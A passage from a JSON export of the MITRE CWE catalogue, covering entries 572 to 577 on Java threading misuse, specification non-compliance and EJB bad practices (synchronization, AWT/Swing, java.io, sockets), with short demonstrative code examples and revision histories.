Dalci","Modification_Organization":"Cigital","Modification_Date":"2008-07-01","Modification_Comment":"updated Potential_Mitigations, Time_of_Introduction"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2008-09-08","Modification_Comment":"updated Relationships, Other_Notes"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2008-11-24","Modification_Comment":"updated Relationships, Taxonomy_Mappings"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2009-07-27","Modification_Comment":"updated Demonstrative_Examples, Other_Notes, Potential_Mitigations"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2011-06-01","Modification_Comment":"updated Common_Consequences"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2011-06-27","Modification_Comment":"updated Common_Consequences"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2011-09-13","Modification_Comment":"updated Relationships, Taxonomy_Mappings"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2012-05-11","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2014-07-30","Modification_Comment":"updated Relationships, Taxonomy_Mappings"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2017-11-08","Modification_Comment":"updated Applicable_Platforms, Relationships, Taxonomy_Mappings"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2020-02-24","Modification_Comment":"updated Relationships, Type"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2020-08-20","Modification_Comment":"updated Relationships"}]}},"572":{"attr":{"@_ID":"572","@_Name":"Call to Thread run() instead of start()","@_Abstraction":"Variant","@_Structure":"Simple","@_Status":"Draft"},"Description":"The program calls a thread\'s run() method instead of calling start(), which causes the code to run in the thread of the caller instead of the callee.","Extended_Description":"In most cases a direct call to a Thread object\'s run() method is a bug. The programmer intended to begin a new thread of control, but accidentally called run() instead of start(), so the run() method will execute in the caller\'s thread of control.","Related_Weaknesses":{"Related_Weakness":{"attr":{"@_Nature":"ChildOf","@_CWE_ID":"821","@_View_ID":"1000","@_Ordinal":"Primary"}}},"Applicable_Platforms":{"Language":{"attr":{"@_Name":"Java","@_Prevalence":"Undetermined"}}},"Modes_Of_Introduction":{"Introduction":{"Phase":"Implementation"}},"Common_Consequences":{"Consequence":{"Scope":"Other","Impact":["Quality Degradation","Varies by Context"]}},"Potential_Mitigations":{"Mitigation":{"Phase":"Implementation","Description":"Use the start() method instead of the run() method."}},"Demonstrative_Examples":{"Demonstrative_Example":{"Intro_Text":"The following excerpt from a Java program mistakenly calls run() instead of start().","Example_Code":{"attr":{"@_Nature":"bad","@_Language":"Java"},"xhtml:div":{"#text":"Thread thr = new Thread() {};thr.run();","xhtml:div":{"#text":"public void run() {}","attr":{"@_style":"margin-left:10px;"},"xhtml:div":{"#text":"...","attr":{"@_style":"margin-left:10px;"}}},"xhtml:br":["",""]}}}},"Affected_Resources":{"Affected_Resource":"System Process"},"Taxonomy_Mappings":{"Taxonomy_Mapping":[{"attr":{"@_Taxonomy_Name":"The CERT Oracle Secure Coding Standard for Java (2011)"},"Entry_ID":"THI00-J","Entry_Name":"Do not invoke Thread.run()"},{"attr":{"@_Taxonomy_Name":"Software Fault Patterns"},"Entry_ID":"SFP3","Entry_Name":"Use of an improper API"}]},"Content_History":{"Submission":{"Submission_Name":"CWE Community","Submission_Date":"2006-12-15","Submission_Comment":"Submitted by members of the CWE community to extend early CWE versions"},"Modification":[{"Modification_Name":"Eric Dalci","Modification_Organization":"Cigital","Modification_Date":"2008-07-01","Modification_Comment":"updated Potential_Mitigations, Time_of_Introduction"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2008-09-08","Modification_Comment":"updated Relationships, Other_Notes"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2009-05-27","Modification_Comment":"updated Demonstrative_Examples"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2009-07-27","Modification_Comment":"updated Description, Other_Notes"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2010-09-27","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2011-06-01","Modification_Comment":"updated Common_Consequences, Relationships, Taxonomy_Mappings"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2011-06-27","Modification_Comment":"updated Common_Consequences"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2012-05-11","Modification_Comment":"updated Relationships, Taxonomy_Mappings"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2012-10-30","Modification_Comment":"updated Potential_Mitigations"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2014-07-30","Modification_Comment":"updated Relationships, Taxonomy_Mappings"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2017-11-08","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2019-01-03","Modification_Comment":"updated Relationships, Taxonomy_Mappings"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2020-02-24","Modification_Comment":"updated Relationships"}],"Previous_Entry_Name":{"#text":"Call to Thread.run()","attr":{"@_Date":"2008-04-11"}}}},"573":{"attr":{"@_ID":"573","@_Name":"Improper Following of Specification by Caller","@_Abstraction":"Class","@_Structure":"Simple","@_Status":"Draft"},"Description":"The software does not follow or incorrectly follows the specifications as required by the implementation language, environment, framework, protocol, or platform.","Extended_Description":"When leveraging external functionality, such as an API, it is important that the caller does so in accordance with the requirements of the external functionality or else unintended behaviors may result, possibly leaving the system vulnerable to any number of exploits.","Related_Weaknesses":{"Related_Weakness":{"attr":{"@_Nature":"ChildOf","@_CWE_ID":"710","@_View_ID":"1000","@_Ordinal":"Primary"}}},"Weakness_Ordinalities":{"Weakness_Ordinality":{"Ordinality":"Primary"}},"Modes_Of_Introduction":{"Introduction":{"Phase":"Implementation"}},"Common_Consequences":{"Consequence":{"Scope":"Other","Impact":["Quality Degradation","Varies by Context"]}},"Observed_Examples":{"Observed_Example":[{"Reference":"CVE-2006-7140","Description":"Crypto implementation removes padding when it shouldn\'t, allowing forged signatures","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2006-7140"},{"Reference":"CVE-2006-4339","Description":"Crypto implementation removes padding when it shouldn\'t, allowing forged signatures","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2006-4339"}]},"Taxonomy_Mappings":{"Taxonomy_Mapping":{"attr":{"@_Taxonomy_Name":"The CERT Oracle Secure Coding Standard for Java (2011)"},"Entry_ID":"MET10-J","Entry_Name":"Follow the general contract when implementing the compareTo() method"}},"Content_History":{"Submission":{"Submission_Name":"CWE Community","Submission_Date":"2006-12-15","Submission_Comment":"Submitted by members of the CWE community to extend early CWE versions"},"Modification":[{"Modification_Name":"Eric Dalci","Modification_Organization":"Cigital","Modification_Date":"2008-07-01","Modification_Comment":"updated Time_of_Introduction"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2008-09-08","Modification_Comment":"updated Description, Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2011-03-29","Modification_Comment":"updated Description, Name"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2011-06-01","Modification_Comment":"updated Common_Consequences, Relationships, Taxonomy_Mappings"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2011-06-27","Modification_Comment":"updated Common_Consequences"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2012-05-11","Modification_Comment":"updated Relationships, Taxonomy_Mappings"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2014-07-30","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2017-01-19","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2017-11-08","Modification_Comment":"updated Observed_Examples, Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2019-01-03","Modification_Comment":"updated Relationships, Taxonomy_Mappings, Weakness_Ordinalities"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2020-02-24","Modification_Comment":"updated Relationships"}],"Previous_Entry_Name":{"#text":"Failure to Follow Specification","attr":{"@_Date":"2011-03-29"}}}},"574":{"attr":{"@_ID":"574","@_Name":"EJB Bad Practices: Use of Synchronization Primitives","@_Abstraction":"Variant","@_Structure":"Simple","@_Status":"Draft"},"Description":"The program violates the Enterprise JavaBeans (EJB) specification by using thread synchronization primitives.","Extended_Description":"The Enterprise JavaBeans specification requires that every bean provider follow a set of programming guidelines designed to ensure that the bean will be portable and behave consistently in any EJB container. In this case, the program violates the following EJB guideline: \\"An enterprise bean must not use thread synchronization primitives to synchronize execution of multiple instances.\\" The specification justifies this requirement in the following way: \\"This rule is required to ensure consistent runtime semantics because while some EJB containers may use a single JVM to execute all enterprise bean\'s instances, others may distribute the instances across multiple JVMs.\\"","Related_Weaknesses":{"Related_Weakness":[{"attr":{"@_Nature":"ChildOf","@_CWE_ID":"695","@_View_ID":"1000"}},{"attr":{"@_Nature":"ChildOf","@_CWE_ID":"821","@_View_ID":"1000","@_Ordinal":"Primary"}}]},"Applicable_Platforms":{"Language":{"attr":{"@_Name":"Java","@_Prevalence":"Undetermined"}}},"Modes_Of_Introduction":{"Introduction":[{"Phase":"Architecture and Design"},{"Phase":"Implementation"}]},"Common_Consequences":{"Consequence":{"Scope":"Other","Impact":"Quality Degradation"}},"Potential_Mitigations":{"Mitigation":{"Phase":"Implementation","Description":"Do not use Synchronization Primitives when writing EJBs."}},"Demonstrative_Examples":{"Demonstrative_Example":{"Intro_Text":"In the following Java example a Customer Entity EJB provides access to customer information in a database for a business application.","Example_Code":{"attr":{"@_Nature":"bad","@_Language":"Java"},"xhtml:div":{"#text":"@Entitypublic class Customer implements Serializable {}","xhtml:br":["",""],"xhtml:div":{"attr":{"@_style":"margin-left:10px;"},"xhtml:div":{"#text":"private String id;private String firstName;private String lastName;private Address address;public Customer() {...}public Customer(String id, String firstName, String lastName) {...}@Idpublic String getCustomerId() {...}public synchronized void setCustomerId(String id) {...}public String getFirstName() {...}public synchronized void setFirstName(String firstName) {...}public String getLastName() {...}public synchronized void setLastName(String lastName) {...}@OneToOne()public Address getAddress() {...}public synchronized void setAddress(Address address) {...}","xhtml:br":["","","","","","","","","","","","","","","","","","","","","","","","",""]}}}},"Body_Text":"However, the customer entity EJB uses the synchronized keyword for the set methods to attempt to provide thread safe synchronization for the member variables. The use of synchronized methods violate the restriction of the EJB specification against the use synchronization primitives within EJBs. Using synchronization primitives may cause inconsistent behavior of the EJB when used within different EJB containers."}},"Taxonomy_Mappings":{"Taxonomy_Mapping":{"attr":{"@_Taxonomy_Name":"Software Fault Patterns"},"Entry_ID":"SFP3","Entry_Name":"Use of an improper API"}},"Content_History":{"Submission":{"Submission_Name":"CWE Community","Submission_Date":"2006-12-15","Submission_Comment":"Submitted by members of the CWE community to extend early CWE versions"},"Modification":[{"Modification_Name":"Eric Dalci","Modification_Organization":"Cigital","Modification_Date":"2008-07-01","Modification_Comment":"updated Potential_Mitigations, Time_of_Introduction"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2008-09-08","Modification_Comment":"updated Relationships, Other_Notes"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2009-10-29","Modification_Comment":"updated Description, Other_Notes"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2010-04-05","Modification_Comment":"updated Demonstrative_Examples"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2010-09-27","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2010-12-13","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2011-06-01","Modification_Comment":"updated Common_Consequences"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2011-06-27","Modification_Comment":"updated Common_Consequences"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2012-05-11","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2012-10-30","Modification_Comment":"updated Potential_Mitigations"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2014-07-30","Modification_Comment":"updated Relationships, Taxonomy_Mappings"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2020-02-24","Modification_Comment":"updated Relationships"}]}},"575":{"attr":{"@_ID":"575","@_Name":"EJB Bad Practices: Use of AWT Swing","@_Abstraction":"Variant","@_Structure":"Simple","@_Status":"Draft"},"Description":"The program violates the Enterprise JavaBeans (EJB) specification by using AWT/Swing.","Extended_Description":"The Enterprise JavaBeans specification requires that every bean provider follow a set of programming guidelines designed to ensure that the bean will be portable and behave consistently in any EJB container. In this case, the program violates the following EJB guideline: \\"An enterprise bean must not use the AWT functionality to attempt to output information to a display, or to input information from a keyboard.\\" The specification justifies this requirement in the following way: \\"Most servers do not allow direct interaction between an application program and a keyboard/display attached to the server system.\\"","Related_Weaknesses":{"Related_Weakness":{"attr":{"@_Nature":"ChildOf","@_CWE_ID":"695","@_View_ID":"1000","@_Ordinal":"Primary"}}},"Applicable_Platforms":{"Language":{"attr":{"@_Name":"Java","@_Prevalence":"Undetermined"}}},"Modes_Of_Introduction":{"Introduction":[{"Phase":"Architecture and Design"},{"Phase":"Implementation"}]},"Common_Consequences":{"Consequence":{"Scope":"Other","Impact":"Quality Degradation"}},"Potential_Mitigations":{"Mitigation":{"Phase":"Architecture and Design","Description":"Do not use AWT/Swing when writing EJBs."}},"Demonstrative_Examples":{"Demonstrative_Example":{"Intro_Text":"The following Java example is a simple converter class for converting US dollars to Yen. This converter class demonstrates the improper practice of using a stateless session Enterprise JavaBean that implements an AWT Component and AWT keyboard event listener to retrieve keyboard input from the user for the amount of the US dollars to convert to Yen.","Example_Code":[{"attr":{"@_Nature":"bad","@_Language":"Java"},"xhtml:div":{"#text":"@Statelesspublic class ConverterSessionBean extends Component implements KeyListener, ConverterSessionRemote {}","xhtml:br":"","xhtml:div":{"attr":{"@_style":"margin-left:10px;"},"xhtml:div":{"#text":"...private StringBuffer enteredText = new StringBuffer();private BigDecimal yenRate = new BigDecimal(\\"115.3100\\");public ConverterSessionBean() {}public BigDecimal dollarToYen(BigDecimal dollars) {}public void keyTyped(KeyEvent event) {}public void keyPressed(KeyEvent e) {}public void keyReleased(KeyEvent e) {}public void paint(Graphics g) {...}...","xhtml:br":["","","","","","","","","","","","","","","","","","","","","","","","","","","",""],"xhtml:i":["/* member variables for receiving keyboard input using AWT API */","/* conversion rate on US dollars to Yen */","/* member functions for implementing AWT KeyListener interface */","/* member functions for receiving keyboard input and displaying output */"],"xhtml:div":[{"attr":{"@_style":"margin-left:10px;"},"xhtml:div":{"#text":"super();...addKeyListener(this);","xhtml:br":["","","",""],"xhtml:i":"/* method calls for setting up AWT Component for receiving keyboard input */"}},{"#text":"BigDecimal result = dollars.multiply(yenRate);return result.setScale(2, BigDecimal.ROUND_DOWN);","attr":{"@_style":"margin-left:10px;"},"xhtml:br":""},{"#text":"...","attr":{"@_style":"margin-left:10px;"}}]}}}},{"attr":{"@_Nature":"good","@_Language":"Java"},"xhtml:div":{"#text":"@Statelesspublic class ConverterSessionBean implements ConverterSessionRemoteInterface {}","xhtml:br":"","xhtml:div":{"attr":{"@_style":"margin-left:10px;"},"xhtml:div":{"#text":"private BigDecimal yenRate = new BigDecimal(\\"115.3100\\");public ConverterSessionBean() {}public BigDecimal dollarToYen(BigDecimal dollars) {}","xhtml:br":["","","","","","","","",""],"xhtml:i":["/* conversion rate on US dollars to Yen */","/* remote method to convert US dollars to Yen */"],"xhtml:div":{"#text":"BigDecimal result = dollars.multiply(yenRate);return result.setScale(2, BigDecimal.ROUND_DOWN);","attr":{"@_style":"margin-left:10px;"},"xhtml:br":""}}}}},{"attr":{"@_Nature":"good","@_Language":"JSP"},"xhtml:div":{"#text":"<%@ page import=\\"converter.ejb.Converter, java.math.*, javax.naming.*\\"%><%!%><html></html>","xhtml:br":["","",""],"xhtml:div":[{"attr":{"@_style":"margin-left:10px;"},"xhtml:div":{"#text":"private Converter converter = null;public void jspInit() {}public void jspDestroy() {}","xhtml:br":["",""],"xhtml:div":[{"#text":"try {} catch (Exception ex) {}","attr":{"@_style":"margin-left:10px;"},"xhtml:div":[{"#text":"InitialContext ic = new InitialContext();converter = (Converter) ic.lookup(Converter.class.getName());","attr":{"@_style":"margin-left:10px;"},"xhtml:br":""},{"#text":"System.out.println(\\"Couldn\'t create converter bean.\\"+ ex.getMessage());","attr":{"@_style":"margin-left:10px;"}}]},{"#text":"converter = null;","attr":{"@_style":"margin-left:10px;"}}]}},{"attr":{"@_style":"margin-left:10px;"},"xhtml:div":{"#text":"<head><title>Converter</title></head><body bgcolor=\\"white\\"></body>","xhtml:br":"","xhtml:div":{"attr":{"@_style":"margin-left:10px;"},"xhtml:div":{"#text":"<h1>Converter</h1><hr><p>Enter an amount to convert:</p><form method=\\"get\\"></form><%%><p><%= amount %> dollars are <%= yenAmount %> Yen.<p><%%>","xhtml:br":["","","","","","","","","",""],"xhtml:div":[{"#text":"<input type=\\"text\\" name=\\"amount\\" size=\\"25\\"><br><p><input type=\\"submit\\" value=\\"Submit\\"><input type=\\"reset\\" value=\\"Reset\\">","attr":{"@_style":"margin-left:10px;"},"xhtml:br":["","",""]},{"#text":"String amount = request.getParameter(\\"amount\\");if ( amount != null && amount.length() > 0 ) {","attr":{"@_style":"margin-left:10px;"},"xhtml:br":"","xhtml:div":{"#text":"BigDecimal d = new BigDecimal(amount);BigDecimal yenAmount = converter.dollarToYen(d);","attr":{"@_style":"margin-left:10px;"},"xhtml:br":""}},{"#text":"}","attr":{"@_style":"margin-left:10px;"}}]}}}}]}}],"Body_Text":["This use of the AWT and Swing APIs within any kind of Enterprise JavaBean not only violates the restriction of the EJB specification against using AWT or Swing within an EJB but also violates the intended use of Enterprise JavaBeans to separate business logic from presentation logic.","The Stateless Session Enterprise JavaBean should contain only business logic. Presentation logic should be provided by some other mechanism such as Servlets or Java Server Pages (JSP) as in the following Java/JSP example."]}},"Taxonomy_Mappings":{"Taxonomy_Mapping":{"attr":{"@_Taxonomy_Name":"Software Fault Patterns"},"Entry_ID":"SFP3","Entry_Name":"Use of an improper API"}},"Content_History":{"Submission":{"Submission_Name":"CWE Community","Submission_Date":"2006-12-15","Submission_Comment":"Submitted by members of the CWE community to extend early CWE versions"},"Modification":[{"Modification_Name":"Eric Dalci","Modification_Organization":"Cigital","Modification_Date":"2008-07-01","Modification_Comment":"updated Potential_Mitigations, Time_of_Introduction"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2008-09-08","Modification_Comment":"updated Relationships, Other_Notes"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2009-10-29","Modification_Comment":"updated Description, Other_Notes"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2009-12-28","Modification_Comment":"updated Demonstrative_Examples, Potential_Mitigations"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2011-06-01","Modification_Comment":"updated Common_Consequences"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2011-06-27","Modification_Comment":"updated Common_Consequences"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2012-05-11","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2014-07-30","Modification_Comment":"updated Relationships, Taxonomy_Mappings"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2020-02-24","Modification_Comment":"updated Relationships"}]}},"576":{"attr":{"@_ID":"576","@_Name":"EJB Bad Practices: Use of Java I/O","@_Abstraction":"Variant","@_Structure":"Simple","@_Status":"Draft"},"Description":"The program violates the Enterprise JavaBeans (EJB) specification by using the java.io package.","Extended_Description":"The Enterprise JavaBeans specification requires that every bean provider follow a set of programming guidelines designed to ensure that the bean will be portable and behave consistently in any EJB container. In this case, the program violates the following EJB guideline: \\"An enterprise bean must not use the java.io package to attempt to access files and directories in the file system.\\" The specification justifies this requirement in the following way: \\"The file system APIs are not well-suited for business components to access data. Business components should use a resource manager API, such as JDBC, to store data.\\"","Related_Weaknesses":{"Related_Weakness":{"attr":{"@_Nature":"ChildOf","@_CWE_ID":"695","@_View_ID":"1000","@_Ordinal":"Primary"}}},"Applicable_Platforms":{"Language":{"attr":{"@_Name":"Java","@_Prevalence":"Undetermined"}}},"Modes_Of_Introduction":{"Introduction":[{"Phase":"Architecture and Design"},{"Phase":"Implementation"}]},"Common_Consequences":{"Consequence":{"Scope":"Other","Impact":"Quality Degradation"}},"Potential_Mitigations":{"Mitigation":{"Phase":"Implementation","Description":"Do not use Java I/O when writing EJBs."}},"Demonstrative_Examples":{"Demonstrative_Example":{"Intro_Text":"The following Java example is a simple stateless Enterprise JavaBean that retrieves the interest rate for the number of points for a mortgage. In this example, the interest rates for various points are retrieved from an XML document on the local file system, and the EJB uses the Java I/O API to retrieve the XML document from the local file system.","Example_Code":[{"attr":{"@_Nature":"bad","@_Language":"Java"},"xhtml:div":{"#text":"@Statelesspublic class InterestRateBean implements InterestRateRemote {}","xhtml:br":["",""],"xhtml:div":{"attr":{"@_style":"margin-left:10px;"},"xhtml:div":{"#text":"private Document interestRateXMLDocument = null;private File interestRateFile = null;public InterestRateBean() {}public BigDecimal getInterestRate(Integer points) {}private BigDecimal getInterestRateFromXML(Integer points) {...}","xhtml:br":["","","","","","","","",""],"xhtml:div":[{"attr":{"@_style":"margin-left:10px;"},"xhtml:div":{"#text":"try {} catch (IOException ex) {...}","xhtml:div":{"attr":{"@_style":"margin-left:10px;"},"xhtml:div":{"#text":"interestRateFile = new File(Constants.INTEREST_RATE_FILE);if (interestRateFile.exists()){}","xhtml:br":["","","","",""],"xhtml:i":"/* get XML document from the local filesystem */","xhtml:div":{"#text":"DocumentBuilderFactory dbf = DocumentBuilderFactory.newInstance();DocumentBuilder db = dbf.newDocumentBuilder();interestRateXMLDocument = db.parse(interestRateFile);","attr":{"@_style":"margin-left:10px;"},"xhtml:br":["",""]}}}}},{"#text":"return getInterestRateFromXML(points);","attr":{"@_style":"margin-left:10px;"}}],"xhtml:i":"/* member function to retrieve interest rate from XML document on the local file system */"}}}},{"attr":{"@_Nature":"good","@_Language":"Java"},"xhtml:div":{"#text":"@Statelesspublic class InterestRateBean implements InterestRateRemote {}","xhtml:br":"","xhtml:div":{"attr":{"@_style":"margin-left:10px;"},"xhtml:div":{"#text":"public InterestRateBean() {}public BigDecimal getInterestRate(Integer points) {}private BigDecimal getInterestRateFromXMLParser(Integer points) {...}","xhtml:br":["","","","","","","",""],"xhtml:div":{"#text":"return getInterestRateFromXMLParser(points);","attr":{"@_style":"margin-left:10px;"}},"xhtml:i":"/* member function to retrieve interest rate from XML document using an XML parser API */"}}}}],"Body_Text":["This use of the Java I/O API within any kind of Enterprise JavaBean violates the EJB specification by using the java.io package for accessing files within the local filesystem.","An Enterprise JavaBean should use a resource manager API for storing and accessing data. In the following example, the private member function getInterestRateFromXMLParser uses an XML parser API to retrieve the interest rates."]}},"Taxonomy_Mappings":{"Taxonomy_Mapping":{"attr":{"@_Taxonomy_Name":"Software Fault Patterns"},"Entry_ID":"SFP3","Entry_Name":"Use of an improper API"}},"Content_History":{"Submission":{"Submission_Name":"CWE Community","Submission_Date":"2006-12-15","Submission_Comment":"Submitted by members of the CWE community to extend early CWE versions"},"Modification":[{"Modification_Name":"Eric Dalci","Modification_Organization":"Cigital","Modification_Date":"2008-07-01","Modification_Comment":"updated Potential_Mitigations, Time_of_Introduction"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2008-09-08","Modification_Comment":"updated Relationships, Other_Notes"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2009-10-29","Modification_Comment":"updated Description, Other_Notes"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2009-12-28","Modification_Comment":"updated Demonstrative_Examples"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2011-06-01","Modification_Comment":"updated Common_Consequences"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2011-06-27","Modification_Comment":"updated Common_Consequences"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2012-05-11","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2012-10-30","Modification_Comment":"updated Potential_Mitigations"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2014-07-30","Modification_Comment":"updated Relationships, Taxonomy_Mappings"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2020-02-24","Modification_Comment":"updated Relationships"}]}},"577":{"attr":{"@_ID":"577","@_Name":"EJB Bad Practices: Use of Sockets","@_Abstraction":"Variant","@_Structure":"Simple","@_Status":"Draft"},"Description":"The program violates the Enterprise JavaBeans (EJB) specification by using sockets.","Extended_Description":"The Enterprise JavaBeans specification requires that every bean provider follow a set of programming guidelines designed to ensure that the bean will be portable and behave consistently in any EJB container. In this case, the program violates the following EJB guideline: \\"An enterprise bean must not attempt to listen on a socket, accept connections on a socket, or use a socket for multicast.\\" The specification justifies this requirement in the following way: \\"The EJB architecture allows an enterprise bean instance to be a network socket client, but it does not allow it to be a network server. Allowing the instance to become a network server would conflict with the basic function of the enterprise bean-- to serve the EJB clients.\\"","Related_Weaknesses":{"Related_Weakness":{"attr":{"@_Nature":"ChildOf","@_CWE_ID":"573","@_View_ID":"1000","@_Ordinal":"Primary"}}},"Applicable_Platforms":{"Language":{"attr":{"@_Name":"Java","@_Prevalence":"Undetermined"}}},"Modes_Of_Introduction":{"Introduction":[{"Phase":"Architecture and Design"},{"Phase":"Implementation"}]},"Common_Consequences":{"Consequence":{"Scope":"Other","Impact":"Quality Degradation"}},"Potential_Mitigations":{"Mitigation":{"Phase":["Architecture and Design","Implementation"],"Description":"Do not use Sockets when writing EJBs."}},"Demonstrative_Examples":{"Demonstrative_Example":{"Intro_Text":"The following Java example is a simple stateless Enterprise JavaBean that retrieves stock symbols and stock values. The Enterprise JavaBean creates a socket and listens for and accepts connections from clients on the socket.","Example_Code":[{"attr":{"@_Nature":"bad","@_Language":"Java"},"xhtml:div":{"#text":"@Statelesspublic class StockSymbolBean implements StockSymbolRemote {}","xhtml:br":"","xhtml:div":{"attr":{"@_style":"margin-left:10px;"},"xhtml:div":{"#text":"ServerSocket serverSocket = null;Socket clientSocket = null;public StockSymbolBean() {}public String getStockSymbol(String name) {...}public BigDecimal getStockValue(String symbol) {...}private void processClientInputFromSocket() {...}","xhtml:br":["","","","","","","","","",""],"xhtml:div":{"attr":{"@_style":"margin-left:10px;"},"xhtml:div":{"#text":"try {} catch (IOException ex) {...}try {} catch (IOException e) {...}","xhtml:div":[{"#text":"serverSocket = new ServerSocket(Constants.SOCKET_PORT);","attr":{"@_style":"margin-left:10px;"}},{"#text":"clientSocket = serverSocket.accept();","attr":{"@_style":"margin-left:10px;"}}],"xhtml:br":["",""]}}}}}},{"attr":{"@_Nature":"bad","@_Language":"Java"},"xhtml:div":{"#text":"@Statelesspublic class StockSymbolBean extends Thread implements StockSymbolRemote {}","xhtml:br":"","xhtml:div":{"attr":{"@_style":"margin-left:10px;"},"xhtml:div":{"#text":"ServerSocket serverSocket = null;Socket clientSocket = null;boolean listening = false;public StockSymbolBean() {}public String getStockSymbol(String name) {...}public BigDecimal getStockValue(String symbol) {...}public void run() {}","xhtml:br":["","","","","","","","","","","",""],"xhtml:div":[{"attr":{"@_style":"margin-left:10px;"},"xhtml:div":{"#text":"try {} catch (IOException ex) {...}listening = true;while(listening) {}","xhtml:div":[{"#text":"serverSocket = new ServerSocket(Constants.SOCKET_PORT);","attr":{"@_style":"margin-left:10px;"}},{"#text":"start();","attr":{"@_style":"margin-left:10px;"}}],"xhtml:br":["","",""]}},{"#text":"try {} catch (IOException e) {...}...","attr":{"@_style":"margin-left:10px;"},"xhtml:div":{"#text":"clientSocket = serverSocket.accept();","attr":{"@_style":"margin-left:10px;"}},"xhtml:br":""}]}}}}],"Body_Text":["And the following Java example is similar to the previous example but demonstrates the use of multicast socket connections within an Enterprise JavaBean.","The previous two examples within any type of Enterprise JavaBean violate the EJB specification by attempting to listen on a socket, accepting connections on a socket, or using a socket for multicast."]}},"Taxonomy_Mappings":{"Taxonomy_Mapping":{"attr":{"@_Taxonomy_Name":"Software Fault Patterns"},"Entry_ID":"SFP3","Entry_Name":"Use of an improper API"}},"Content_History":{"Submission":{"Submission_Name":"CWE Community","Submission_Date":"2006-12-15","Submission_Comment":"Submitted by members of the CWE community to extend early CWE 